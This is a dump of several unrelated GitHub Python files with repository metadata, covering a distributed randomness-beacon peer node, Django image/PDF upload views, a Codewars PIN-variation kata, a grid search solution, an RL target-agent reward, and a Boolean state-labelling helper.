time.time()\n print(\"%s (%s/%s) consensus on %s, initial time: %.2f, echo time: %.2f, ready time: %.2f sendingCnt:%s\"%\\\n ( mynode.id, mynode.curSeq[int(mynode.id)], mynode.seq, seq, ts-rv['ts'], ts-rv['ts1'], ts-rv['ts2'] ,mynode.sendingCnt) )\n # time.sleep(100)\n # print(seq, seqistr, mynode.msgs[tp][seqistr])\n if seq.startswith(\"ld_%sseq_\"%(mynode.id)):\n \n while mynode.seq - config[\"C_Ptimes\"]* C_Plen > mynode.curSeq[int(mynode.id)] :\n time.sleep(1)\n\n if CTs == None:\n CTs = [json.loads(json.dumps(mynode.pvss.share(n,f+1))) for i in range(0, C_Plen)] \n # CTs = [json.loads(json.dumps(mynode.pvss.share(n,f+1))) for i in range(0, C_Plen)] \n\n sv={'C_Ps': CTs} \n sv['seq'] = \"ld_%sseq_%d\"%(mynode.id, mynode.seq) \n sv['epoch'] = epoch\n sv['ts'] = time.time()\n sv['ts1'] = time.time()\n hC_Ps = mynode.pvss.hash(sv['C_Ps'])\n for i in range(0, C_Plen):\n seqi = mynode.seq +i \n seqistr = 'ld_%sseq_%d'%(leaderID, seqi)\n if seqistr not in mynode.msgs[\"initial\"]:\n mynode.msgs[\"initial\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"initial\"][seqistr]:\n mynode.msgs[\"initial\"][seqistr][mynode.id]=sv['C_Ps'][i]\n if seqistr not in mynode.msgs[\"echo\"]:\n mynode.msgs[\"echo\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"echo\"][seqistr]:\n mynode.msgs[\"echo\"][seqistr][mynode.id]=hC_Ps\n \n mynode.seq += C_Plen\n mynode.send_to_nodes({\"type\": \"initial\", \"v\": json.dumps(sv)}) \n print(\"node%s start to initial at seq:%s\"%(mynode.id, mynode.seq))\n sv['hC_Ps'] = hC_Ps\n del sv['C_Ps']\n mynode.send_to_nodes({\"type\": \"echo\", \"v\": json.dumps(sv)}) \n elif tp == \"recon\":\n if epoch not in mynode.cis[tp]:\n mynode.cis[tp][epoch] = {} \n mynode.cis[tp][epoch][yourid] = rv['c_i'] \n L = rv['L']\n seq = rv['seq']\n Re_1=rv['Re_1']\n\n \n # print(mynode.id, tp, epoch, len(mynode.cis[tp][epoch]))\n if len(mynode.cis[tp][epoch]) > f:\n if str(L) not in mynode.msgs[\"initial\"][seq]:\n print(\"node %s str(L) not in mynode.msgs['initial'][seq]\"%(mynode.id))\n return\n if not mynode.cis[sentConsumer]:\n mynode.cis[sentConsumer] = True\n else:\n return\n time.sleep(0.05) \n C=mynode.msgs[\"initial\"][seq][str(L)]['C']\n starttime = time.time()\n cis=mynode.cis[tp][epoch].copy()\n gs = mynode.pvss.recon(C, cis)\n \n beaconV = int(mynode.pvss.hash(str(Re_1)+str(gs)))\n\n sv = {\"beaconV\":beaconV} \n sv['epoch'] = epoch \n sv['seq'] = seq\n sv['newepoch'] = rv['newepoch']\n sv['L'] = rv['L'] \n sv['LQ']=rv['LQ']\n sv['Re_1'] = rv['Re_1']\n sv['ts'] = rv['ts']\n sv['ts1'] = rv['ts1']\n sv['ts2'] = time.time()\n # time.sleep(0.05)\n if epoch not in mynode.cis[\"reconEcho\"]:\n mynode.cis[\"reconEcho\"][epoch]={}\n if mynode.id not in mynode.cis[\"reconEcho\"][epoch]:\n mynode.cis[\"reconEcho\"][epoch][mynode.id]=sv['beaconV']\n \n mynode.send_to_nodes({\"type\": \"reconEcho\", \"v\": json.dumps(sv)})\n\n elif tp == \"reconEcho\": \n mynode.cis[tp][epoch][yourid] = rv['beaconV']\n \n flag=False\n if len(mynode.cis[\"reconReady\"][epoch]) > f:\n cis_tp_epoch =mynode.cis[\"reconReady\"][epoch].copy()\n values = {} \n for yid in cis_tp_epoch:\n lqHash = mynode.pvss.hash(cis_tp_epoch[yid])\n if lqHash not in values:\n values[lqHash] = 0\n values[lqHash] += 1\n for lqHash in values:\n if values[lqHash] > f:\n flag=True\n\n \n if len(mynode.cis[tp][epoch]) > 2*f or flag:\n if not mynode.cis[sentConsumer]:\n mynode.cis[sentConsumer] = True\n else:\n return \n time.sleep(0.05) \n sv = {\"beaconV\":rv['beaconV']}\n sv['epoch'] = epoch\n sv['seq'] = seq \n sv['newepoch'] = rv['newepoch'] \n sv['L'] = rv['L'] \n sv['Re_1'] = rv['Re_1'] \n sv['LQ'] = rv['LQ']\n sv['ts'] = rv['ts']\n sv['ts1'] = rv['ts1']\n sv['ts2'] = rv['ts2']\n sv['ts3'] = time.time()\n \n if epoch not in mynode.cis[\"reconReady\"]:\n mynode.cis[\"reconReady\"][epoch]={}\n if mynode.id not in mynode.cis[\"reconReady\"][epoch]:\n mynode.cis[\"reconReady\"][epoch][mynode.id]={\"beaconV\":rv['beaconV'],\"LQ\":rv['LQ'],'L':rv['L'], 'Re_1':rv['Re_1'],'newepoch':rv['newepoch']}\n # print(\"node %s send reconReady ct: %s\"%(mynode.id, sv))\n mynode.send_to_nodes({\"type\": \"reconReady\", \"v\": json.dumps(sv)})\n elif tp == \"reconReady\":\n mynode.cis[tp][epoch][yourid] = {\"beaconV\":rv['beaconV'],\"LQ\":rv['LQ'],'L':rv['L'], 'Re_1':rv['Re_1'],'newepoch':rv['newepoch']}\n if len(mynode.cis[tp][epoch]) > 2*f: \n\n cis_tp_epoch =mynode.cis[tp][epoch].copy()\n values = {} \n for yid in cis_tp_epoch:\n lqHash = mynode.pvss.hash(cis_tp_epoch[yid])\n if lqHash not in values:\n values[lqHash] = 0\n values[lqHash] += 1\n\n if values[mynode.pvss.hash(mynode.cis[tp][epoch][yourid])] <= 2*f:\n print(\"node%s reconReady------------------------------------------------------- valid <= 2*f\"%(mynode.id), values[mynode.pvss.hash(mynode.cis[tp][epoch][yourid])])\n return\n\n if not mynode.cis[sentConsumer]:\n mynode.cis[sentConsumer] = True\n else:\n return\n\n if mynode.epoch >= rv['newepoch']:\n print(\"node%s reconReady-------------------------------------------------------mynode.epoch >= rv['newepoch']\"%(mynode.id))\n return\n \n time.sleep(0.05) \n beaconV = rv['beaconV']\n L = rv['L'] \n Re_1 = rv['Re_1']\n mynode.curSeq[L]+=1 \n mynode.LQ.setQueue(list(rv['LQ'])); \n if mynode.LQ.full():\n oldestL = mynode.LQ.get() \n mynode.LQ.put(L) \n mynode.CL={i:True for i in range(1, n+1)}\n for j in mynode.LQ.all():\n if j in mynode.CL:\n del mynode.CL[j]\n keys = list(mynode.CL.keys())\n newL = keys[int(beaconV) % len(mynode.CL)]\n # endtime = time.time()\n \n printStr = \"%s(%s/%s) epoch:%s\"% (mynode.id,mynode.curSeq[int(mynode.id)], mynode.seq, epoch)\n printStr = printStr+ \" Leader%s->%s %s, value: %s %.2fs/2beacon %.2fs %.2fs %.2fs per sendingCnt:%s \"% (L, newL, seq, beaconV%100000,(time.time()-rv['ts'])/mynode.epoch, time.time()-rv['ts1'],time.time()-rv['ts2'],time.time()-rv['ts3'], mynode.sendingCnt)\n printStr = printStr+ \" producer SEND:%.2f\"%(mynode.producerSentSize/(mynode.epoch+(n*config[\"C_Ptimes\"]))/1024.)\n printStr = printStr+ \" producer RCV:%.2f\"%(mynode.producerRecvSize/(mynode.epoch+(n*config[\"C_Ptimes\"]))/1024.)\n printStr = printStr+ \" consumer SEND:%.2f\"%(mynode.consumerSentSize/mynode.epoch/1024.)\n printStr = printStr+ \" consumer RCV:%.2f\"%(mynode.consumerRecvSize/mynode.epoch/1024.)\n \n \n print(printStr)\n \n mynode.Re_1 = beaconV \n mynode.epoch=rv['newepoch']\n mynode.L=L\n mynode.newL = newL\n \nclass Peer(threading.Thread):\n def __init__(self, ID):\n super(Peer, self).__init__()\n self.ID= ID\n self.config = config\n node = Node(ip, port, ID, callback)\n self.node = node\n\n def start(self):\n node = self.node\n self.node.start()\n\n time.sleep(10)\n\n for j in range(int(self.ID)+1, n+1):\n node.connect_with_node(config[\"nodes\"][str(j)][\"ip\"],config[\"portBase\"]+j)\n print(\"Node %s connect %d (%s:%d)\"%(self.ID, j, config[\"nodes\"][str(j)][\"ip\"], config[\"portBase\"]+j)) \n time.sleep(int(ID)/3+10)\n v = {'pk':node.pvss.pk}\n v['epoch'] = -1\n v['seq'] = \"ld_%sseq_%d\"%(self.ID, -1) \n node.send_to_nodes({\"type\": \"pks\", \"v\": json.dumps(v)})\n \n \n keys = list(node.CL.keys())\n node.newL = keys[node.Re_1 % len(node.CL)]\n \n print(node.id, \"choose leader\",node.newL)\n sentDict={}\n \n starttime = time.time()\n\n time.sleep(config['pkswait'])\n print(\"Node %s consumer starts\"%node.id)\n lastReconn = time.time()\n while True:\n\n if len(node.nodes_outbound)+len(node.nodes_inbound) < n-1: \n if time.time() - lastReconn > 5:\n node.reconnect_nodes() \n lastReconn = time.time()\n # time.sleep(0.5)\n # print(\"node%s connections %d node.reconnect_nodes()===========================================\"%(node.id, len(node.nodes_outbound)+len(node.nodes_inbound)))\n\n if node.epoch <= 2:\n starttime = time.time()\n\n # # if \"initial\" in node.msgs and node.curSeq[node.L] in node.msgs[\"initial\"]:\n # # print(len(node.msgs[\"initial\"][node.curSeq[node.L]]))\n time.sleep(config['consumerSleep']) \n if(node.newL == node.L):\n print(\"node.newL == node.L\",node.L)\n continue\n if node.newL not in node.curSeq:\n print(\"node.newL not in node.curSeq\")\n continue\n \n seq = \"ld_%sseq_%d\"%(node.newL, node.curSeq[node.newL])\n # print(\"node%s consume \"%node.id, seq)\n sent = \"sent_%s_%s\"%(\"ready\", seq)\n\n sent2 = \"mynode_%sseq_%d\"%(node.newL,node.curSeq[node.newL])\n if sent2 in sentDict: \n # print(\"%s has sent2 in sentDict\"%node.id,getattr(node, \"id\"), sent2, node.epoch, seq, node.newL)\n continue\n \n # if sent in node.msgs and node.msgs[sent] and \\ \n if \"initial\" in node.msgs and (seq in node.msgs[\"initial\"] and \\\n str(node.newL) in node.msgs[\"initial\"][seq]):# and \\\n # len(node.msgs[\"initial\"][seq][str(node.newL)])>=1 :\n\n sentDict[sent2]=True\n\n EC = node.msgs[\"initial\"][seq][str(node.newL)]\n # print(EC)\n sv = {'c_i': node.pvss.preRecon(EC['C'], self.ID)}\n sv['epoch'] = node.epoch\n sv['newepoch'] = node.epoch+1\n sv['L'] = node.newL\n sv['LQ']=list(node.LQ.all()) \n sv['seq'] = seq\n sv['Re_1'] = node.Re_1\n sv['ts'] = starttime\n sv['ts1'] = time.time()\n # print(\"%s start to consume %d's %dth ciphertext %s cost:%s\"%(node.id, node.newL, node.curSeq[node.newL], int(node.pvss.hash(EC))%100000, time.time()-starttime)) \n if sv['epoch'] not in node.cis['recon']:\n node.cis['recon'][sv['epoch']] = {}\n # if sv['epoch'] not in node.cis['reconEcho']:\n # node.cis['reconEcho'][sv['epoch']] = {}\n # if sv['epoch'] not in node.cis['reconReady']:\n # node.cis['reconReady'][sv['epoch']] = {}\n node.cis['recon'][sv['epoch']][node.id] = sv['c_i']\n node.send_to_nodes({\"type\": \"recon\", \"v\": json.dumps(sv)})\n else:\n # if sent not in node.msgs :\n # print(node.id,\"wait for \",sent)\n if seq not in node.msgs[\"initial\"]:\n print(node.id,\"wait for initial\",seq, \"connected nodes:%s\"%(len(node.nodes_outbound)+len(node.nodes_inbound))) \n else:\n if str(node.newL) not in node.msgs[\"initial\"][seq] :\n print(node.id,\"wait for newL\", str(node.newL), seq, \"connected nodes:%s\"%(len(node.nodes_outbound)+len(node.nodes_inbound))) \n else:\n print(node.id,\"wait for >1\", \"connected nodes:%s\"%(len(node.nodes_outbound)+len(node.nodes_inbound))) \n \n# from flask import Flask, render_template,request,jsonify,redirect,url_for,send_from_directory\n# class MyThread(threading.Thread):\n# def __init__(self, node):\n# super(MyThread, self).__init__()\n# self.node = node\n\n# def run(self): \n# app = Flask(__name__, template_folder = '.',static_folder='',static_url_path='')\n \n# @app.route('/',methods=[\"GET\"])\n# def index():\n# attr = request.args.get(\"attr\")\n# print(attr)\n# return jsonify({attr: json.dumps(getattr(self.node, attr))})\n# print(\"start flask server at\", port+1000)\n# app.run('0.0.0.0', port+1000)\n\n\nif __name__ == '__main__': \n peer = Peer(ID)\n peer.setDaemon(True)\n # app = MyThread(peer.node)\n # app.start()\n peer.start()\n # peer.join()\n ","repo_name":"AppCrypto/beacon","sub_path":"peer.py","file_name":"peer.py","file_ext":"py","file_size_in_byte":23131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71386712233","text":"# Django Imports\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework.parsers import MultiPartParser\nfrom django.http import JsonResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nimport io\nimport os\nimport PyPDF2\nimport base64\nimport fitz\nfrom PIL import Image as PILImage\nfrom PIL import ImageOps\nfrom pdf2image import convert_from_path\nfrom django.core.files.base import ContentFile\nfrom django.shortcuts import get_object_or_404\n\n# User Imports\nfrom .models import Image, PDF\nfrom .serializers import (\n ImageSerializer,\n ImageSerializerDetailed,\n PDFSerializer,\n PDFSerializerDetailed,\n)\nfrom .utils import get_num_pdf_pages, is_pdf, is_image\n\n\n\n# Views here\n\n@api_view([\"POST\"])\ndef upload_file(request):\n # Check HTTP Request\n if request.method != \"POST\":\n return JsonResponse(\n {\"error\": \"Invalid request method\"},\n status=status.HTTP_405_METHOD_NOT_ALLOWED,\n )\n\n # Read data from frontend\n encoded_file_data = request.data.get(\"file\")\n file_extension = request.data.get(\"extension\", \"\").lower()\n\n try:\n filename = encoded_file_data.name.split(\".txt\")[0]\n except AttributeError:\n filename = \"uploaded_file\"\n\n # Exception handle bad body data\n if not encoded_file_data or not file_extension:\n error_message = \"Missing file data or invalid extension\"\n return Response(\n {\"error\": error_message},\n status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE,\n )\n\n # Decode the incomming Base64 file\n try:\n encoded_file_content = encoded_file_data.read()\n decoded_file_data = base64.b64decode(encoded_file_content)\n except:\n return Response(\n {\"error\": \"Invalid base64 file\"},\n status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE,\n )\n\n serialized_data = None\n # Serialize the data with PDF Serializer\n if is_pdf(file_extension):\n # Wrap the decoded bytes in a BytesIO object\n pdf_io = io.BytesIO(decoded_file_data)\n num_pages = get_num_pdf_pages(pdf_io)\n serialized_data = PDFSerializerDetailed(\n data={\n \"file\": ContentFile(\n decoded_file_data, name=f\"{filename}.{file_extension}\"\n ),\n \"num_pages\": num_pages,\n }\n )\n # Serialize the data with Image Serializer\n elif is_image(file_extension):\n serialized_data = ImageSerializer(\n data={\n \"file\": ContentFile(\n decoded_file_data, name=f\"{filename}.{file_extension}\"\n )\n }\n )\n # Exception not Image or PDF\n else:\n return Response(\n {\"error\": \"Unsupported Media Type\"},\n status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE,\n )\n\n # Save the serialized data if valid, and Add attributes neccessary after saving\n try:\n if serialized_data.is_valid():\n document = serialized_data.save()\n\n # Check if it is pdf, save in PDF table and calculate the PDF page height, width\n if is_pdf(file_extension):\n pdf_document = fitz.open(stream=decoded_file_data, filetype=\"pdf\")\n page = pdf_document[0] # First page\n page_width = page.bound().width\n page_height = page.bound().height\n pdf_document.close()\n\n # Update the PDF model instance with calculated values\n document.page_width = page_width\n document.page_height = page_height\n document.save()\n\n # Check if it is Image, save the Image instance and update its page height, width\n elif is_image(file_extension):\n with PILImage.open(document.file.path) as image:\n width, height = image.size\n number_of_channels = len(image.getbands())\n # Update the image model instance with calculated values\n document.width = width\n document.height = height\n document.number_of_channels = number_of_channels\n document.save()\n\n return Response(\n {\"message\": \"File uploaded successfully\", \"document_id\": document.pk},\n status=status.HTTP_200_OK,\n )\n # Error in serialized_data\n else:\n return JsonResponse(\n {\"error\": \"Unsupported Media Type\"}, status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE\n )\n\n # Error in file formate\n except Exception as e:\n return JsonResponse({\"error\": \"Unsupported Media Type\"}, status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)\n\n\n@api_view([\"GET\"])\ndef get_all_images(request):\n images = Image.objects.all()\n serializer = ImageSerializer(images, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view([\"GET\"])\ndef get_all_pdfs(request):\n pdfs = PDF.objects.all()\n serializer = PDFSerializer(pdfs, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view([\"GET\", \"DELETE\"])\ndef get_delete_image(request, id):\n # Get image instance from ID\n try:\n image = Image.objects.get(id=int(id))\n except:\n return JsonResponse(\n {\"error\": \"Image not found\"}, status=status.HTTP_404_NOT_FOUND\n )\n\n # Return detailed image by ID\n if request.method == \"GET\":\n serializer = ImageSerializerDetailed(image)\n return JsonResponse(serializer.data, safe=False)\n\n # Delete image and its file instance by ID\n elif request.method == \"DELETE\":\n image.file.delete()\n image.delete()\n return JsonResponse(\n {\"message\": \"Image Deleted\"}, status=status.HTTP_204_NO_CONTENT\n )\n\n\n@api_view([\"GET\", \"DELETE\"])\ndef get_delete_pdf(request, id):\n # Get pdf instance from ID\n try:\n pdf = PDF.objects.get(id=int(id))\n except:\n return JsonResponse(\n {\"error\": \"PDF not found\"}, status=status.HTTP_404_NOT_FOUND\n )\n\n # Return detailed pdf by ID\n if request.method == \"GET\":\n serializer = PDFSerializerDetailed(pdf)\n return JsonResponse(serializer.data, safe=False)\n\n # Delete pdf and its file instance by ID\n elif request.method == \"DELETE\":\n pdf.file.delete()\n pdf.delete()\n return JsonResponse(\n {\"message\": \"PDF Deleted\"}, status=status.HTTP_204_NO_CONTENT\n )\n\n\n@api_view([\"POST\"])\ndef rotate_image_view(request):\n image_id = request.data.get(\"image_id\")\n rotation_angle = request.data.get(\"rotation_angle\")\n \n # Get image object or raise 404 ID sent does not exist\n try:\n image = Image.objects.get(id=int(image_id))\n except:\n return JsonResponse(\n {\"error\": \"Image not found\"}, status=status.HTTP_404_NOT_FOUND\n )\n\n # Error handle if rotation angle is not a number\n try:\n rotation_angle = int(rotation_angle)\n except ValueError:\n return JsonResponse(\n {\"error\": \"Invalid rotation angle\"}, status=status.HTTP_400_BAD_REQUEST\n )\n\n # Open the image as IO Bytes and create a PIL Image object\n # Open the image as IO Bytes and create a PIL Image object\n with io.BytesIO(image.file.read()) as photo_new_io:\n pil_image = PILImage.open(photo_new_io)\n\n # Rotate the image and allow expansion\n rotated_image = pil_image.rotate(rotation_angle, expand=True)\n\n # Convert the image to RGB mode\n rotated_image = ImageOps.exif_transpose(rotated_image.convert(\"RGB\"))\n\n # Resize if dimensions exceed the defined width and height\n if image.width is not None and image.height is not None:\n if rotated_image.width > image.width or rotated_image.height > image.height:\n rotated_image.thumbnail((image.width, image.height))\n\n # Save the rotated image to IO Bytes\n rotated_image_io = io.BytesIO()\n rotated_image.save(rotated_image_io, format=\"JPEG\")\n\n # Overwrite the existing image file with the rotated image data\n with open(image.file.path, \"wb\") as f:\n f.write(rotated_image_io.getvalue())\n\n # Obtain the rotated image URL\n rotated_image_url = image.file.url\n return JsonResponse(\n {\n \"message\": \"Image rotated\",\n \"rotated_image_url\": rotated_image_url,\n },\n status=status.HTTP_200_OK,\n )\n\n\nfrom pdf2image import convert_from_path\nfrom django.conf import settings\n\n\n@api_view([\"POST\"])\ndef convert_pdf_to_image(request):\n pdf_id = request.data.get(\"pdf_id\")\n\n # Get the PDF object using the provided ID\n try:\n pdf = PDF.objects.get(id=int(pdf_id))\n except:\n return JsonResponse(\n {\"error\": \"PDF not found\"}, status=status.HTTP_404_NOT_FOUND\n )\n\n # Convert the PDF to a list of images\n images = convert_from_path(pdf.file.path)\n # Generate a list of image paths to be returned after conversion\n generated_image_paths = []\n\n for i, image in enumerate(images):\n # Create the 'images' directory if it doesn't exist\n images_dir = \"images/\"\n\n # Extract the PDF file name\n pdf_name = os.path.basename(pdf.file.name)\n\n # Generate image filename with page number\n image_filename = f\"{pdf_name}_page{i+1}.jpg\"\n generated_image_path = os.path.join(images_dir, image_filename)\n\n # Save the image to the 'images' directory\n image.save(\"media/\" + generated_image_path, \"JPEG\")\n\n # Create Image instance in the database\n new_image_instance = Image.objects.create(file=generated_image_path, uploaded_at=pdf.uploaded_at)\n\n # Assign PDF page width, height, and channel values to the image instance\n new_image_instance.width = pdf.page_width\n new_image_instance.height = pdf.page_height\n new_image_instance.number_of_channels = 3 # Assuming RGB format\n\n # Save the updated image instance\n new_image_instance.save()\n\n\n # Add the generated image URL to the list\n generated_image_paths.append(\"/media/\" + generated_image_path)\n\n # Delete the original PDF file and PDF object\n pdf.file.delete()\n pdf.delete()\n\n # Return a success response with generated image paths\n return JsonResponse(\n {\n \"message\": \"PDF converted to image(s) successfully\",\n \"image_paths\": generated_image_paths,\n },\n status=status.HTTP_200_OK,\n )\n","repo_name":"hatemsayed98/Document-processing","sub_path":"myproject/documents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39655476191","text":"\"\"\"\nAlright, detective, one of our colleagues successfully observed our target person, Robby the robber. We followed him to a secret warehouse, where we assume to find all the stolen stuff. The door to this warehouse is secured by an electronic combination lock. Unfortunately our spy isn't sure about the PIN he saw, when Robby entered it.\n\nThe keypad has the following layout:\n\n┌───┬───┬───┐\n│ 1 │ 2 │ 3 │\n├───┼───┼───┤\n│ 4 │ 5 │ 6 │\n├───┼───┼───┤\n│ 7 │ 8 │ 9 │\n└───┼───┼───┘\n │ 0 │\n └───┘\nHe noted the PIN 1357, but he also said, it is possible that each of the digits he saw could actually be another adjacent digit (horizontally or vertically, but not diagonally). E.g. instead of the 1 it could also be the 2 or 4. And instead of the 5 it could also be the 2, 4, 6 or 8.\n\nHe also mentioned, he knows this kind of locks. You can enter an unlimited amount of wrong PINs, they never finally lock the system or sound the alarm. That's why we can try out all possible (*) variations.\n\n* possible in sense of: the observed PIN itself and all variations considering the adjacent digits\n\nCan you help us to find all those variations? It would be nice to have a function, that returns an array (or a list in Java and C#) of all variations for an observed PIN with a length of 1 to 8 digits. We could name the function getPINs (get_pins in python, GetPINs in C#). But please note that all PINs, the observed one and also the results, must be strings, because of potentially leading '0's. We already prepared some test cases for you.\n\nDetective, we count on you!\n\"\"\"\n\n\nfrom itertools import product\n\n\ndef get_possibilities(num):\n D = {0: [1, 2, 3],\n 1: [4, 5, 6],\n 2: [7, 8, 9],\n 3: [None, 0, None]\n }\n r = None\n # find the row, that the number is in:\n for row, nums in D.items():\n if num in nums:\n r = row\n \n # Now get the index of the num:\n i = D[r].index(num)\n\n possib = []\n # get vert - index doesnt change: D[r][i] - r: row-1 to row+1\n row_start = r - 1 if r != 0 else r\n row_end = r + 1 if r != 3 else r\n for R in range(row_start, row_end+1):\n if D[R][i] != None and D[R][i] not in possib:\n possib.append(D[R][i])\n \n # get horiz - Row doesnt change: D[r][i]: index goes from i-1 to i+1\n i_start = i - 1 if i != 0 else i\n i_end = i + 1 if i != 2 else i\n for I in range(i_start, i_end + 1):\n if D[r][I] != None and D[r][I] not in possib:\n possib.append(D[r][I]) \n \n return possib\n\n\n\ndef get_pins(observed):\n P = []\n res = []\n for i in observed:\n P.append(get_possibilities(int(i)))\n \n for ans in product(*P):\n res.append((\"\".join(map(str, ans))))\n\n return res\n\nx = get_pins(\"1234\")\nprint(x)\n\n\n\n\n\n","repo_name":"jkfer/Codewars","sub_path":"The_Observed_PIN.py","file_name":"The_Observed_PIN.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28457417758","text":"import sys\r\nimport math\r\nsys.stdin = open('input.txt', 'r')\r\nN = int(sys.stdin.readline())\r\ngraph = []\r\nfor _ in range(N):\r\n graph.append(list(sys.stdin.readline().rstrip()))\r\nheight = []\r\nfor _ in range(N):\r\n height.append(list(map(int, sys.stdin.readline().split())))\r\n\r\nhomes = 0\r\nfor i in range(N):\r\n for j in range(N):\r\n if graph[i][j] == 'P':\r\n p = (i, j)\r\n elif graph[i][j] == 'K':\r\n homes += 1\r\n\r\ndx = [1, 0, -1, 0, 1, 1, -1, -1]\r\ndy = [0, 1, 0, -1, 1, -1, 1, -1]\r\n\r\nh = []\r\nfor i in range(N):\r\n for j in range(N):\r\n if height[i][j] not in h:\r\n h.append(height[i][j])\r\nh.sort()\r\nprint(h)\r\nans = math.inf\r\nleft, right = 0, 0\r\nwhile left <= right:\r\n cnt = 0\r\n visited = [[False]*N for _ in range(N)]\r\n print(left, right)\r\n if h[left] <= height[p[0]][p[1]] <= h[right]:\r\n visited[p[0]][p[1]] = True\r\n stack = [p]\r\n while stack:\r\n x, y = stack.pop()\r\n if graph[x][y] == 'K':\r\n cnt += 1\r\n for i in range(8):\r\n nx, ny = x+dx[i], y+dy[i]\r\n if 0 <= nx < N and 0 <= ny < N and not visited[nx][ny]:\r\n if h[left] <= height[nx][ny] <= h[right]:\r\n visited[nx][ny] = True\r\n stack.append([nx, ny])\r\n if cnt == homes:\r\n ans = min(ans, h[right]-h[left])\r\n left += 1\r\n else:\r\n if right == len(h)-1:\r\n break\r\n right += 1\r\nprint(ans)","repo_name":"park-hg/algorithm-study","sub_path":"dfs,bfs/2842.py","file_name":"2842.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18125853969","text":"#! /usr/bin/env python\n\nfrom .agent import Agent\nfrom termcolor import colored\n\n\nclass TargetAgent(Agent):\n\t\n\t_target: str\n\t\n\tdef __init__(self, a_id: str, agent_type: int, rank: int = 0):\n\t\t\n\t\tsuper().__init__(a_id, agent_type, rank)\n\t\tself._target = ''\n\t\t\n\t@property\n\tdef target(self) -> str:\n\t\treturn self._target\n\t\n\t@target.setter\n\tdef target(self, new_target: str) -> None:\n\t\tself._target = new_target\n\t\t\n\tdef get_reward(self, raw_reward: float, **extra_info) -> float:\n\t\t\n\t\tenv = extra_info.get(\"env\")\n\t\tif self._target == '':\n\t\t\tprint(colored('No target prey defined, defaulting to base Agent reward', 'yellow'))\n\t\t\treturn super().get_reward(raw_reward, **extra_info)\n\t\tif env is None:\n\t\t\tprint(colored('No environment provided, defaulting to base Agent reward', 'yellow'))\n\t\t\treturn super().get_reward(raw_reward, **extra_info)\n\t\tprey = env.agents[self._target]\n\t\thunter = env.agents[self._id]\n\t\tprey_adj_pos = [(prey.pos[0] - 1, prey.pos[1]), (prey.pos[0] + 1, prey.pos[1]), (prey.pos[0], prey.pos[1] - 1), (prey.pos[0], prey.pos[1] + 1)]\n\t\t\n\t\tif prey.alive and raw_reward > 0 and hunter.pos not in prey_adj_pos:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn raw_reward","repo_name":"miguel-faria/deep_rl","sub_path":"src/dl_envs/pursuit/agents/target_agent.py","file_name":"target_agent.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29671371719","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2021/12/15 14:37\n# @Author : RooFTOooOP\n# @FileName: 正则表达式.py\n# @Software: PyCharm\n\nimport re\n\ndata = ('Mountain View, CA 94040', 'Sunnyvale, CA', 'Los Altos, 94023')\nfor d in data:\n print(re.split(r', +| +(?=(?:\\d{5}|[A-Z]{2}))', d))\n\n","repo_name":"Wang-wenting/MyPythonCode","sub_path":"python高级编程/正则表达式/正则表达式.py","file_name":"正则表达式.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"14340077183","text":"\n\ndef label_state(state, functions=None, node_names=None, str_functions=None, additive=True, sep='/', no_label=\"*\"):\n\n \"\"\"\n Return the label of a state given a set of labeling functions. Labels are additive, if more than one function applies all labels will be added.\n\n Arguments\n ---------\n state (list): state to label, most be ordered according to original node_names\n functions (dic, optional): dictionary of label with its respective boolean function\n node_names (list, optional): ordered name of nodes\n str_functions (str, optional): multiline string of boolean functions.\n format: label = boolean labeling function\n additive (bool, optional): use all appropiate labels, if false only the first label will be used\n sep (string, optional): string to separate multiple labels\n\n Returns\n -------\n label (str): label of state\n \"\"\"\n\n state = [int(s) for s in state] #clean state\n if functions == None: functions = create_label_functions(node_names, str_functions) #create functions if none given\n\n label = []\n for f in functions: #evaluate functions to find apliable labels\n if functions[f](state): label.append(f)\n if len(label) == 0: return no_label\n if additive: \n label = list(set(label)) #remove duplicates\n return sep.join(label) \n else: return label[0]\n\n\ndef create_label_functions(node_names, data):\n \"\"\"\n Declare labeling function from a multiline string of boolean functions.\n\n Arguments\n ---------\n node_names (list of str): names of the nodes in order\n data (str): multiline string of boolean functions.\n format: label = boolean labeling function\n\n Returns\n -------\n functions (dic): dictionary of label with its respective boolean function\n \"\"\"\n\n functions = {}\n data = data.strip().split('\\n')\n data = [x.strip() for x in data if not x.strip().startswith('#')] #remove comented lines\n\n #generate functions\n for d in data:\n d = d.split('=')\n #generate lambda function\n node_lambda = eval(\"lambda (\" +','.join(node_names) +') : ' +d[1].strip()) \n #declare function\n functions [d[0].strip()] = node_lambda\n\n return functions","repo_name":"mar-esther23/regnet","sub_path":"regnet/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24415353908","text":"import numpy as np\n\n# Attension:\n# - Never change the value of input, which will change the result of backward\n\n\nclass operation(object):\n \"\"\"\n Operation abstraction\n \"\"\"\n\n def forward(self, input):\n \"\"\"Forward operation, reture output\"\"\"\n raise 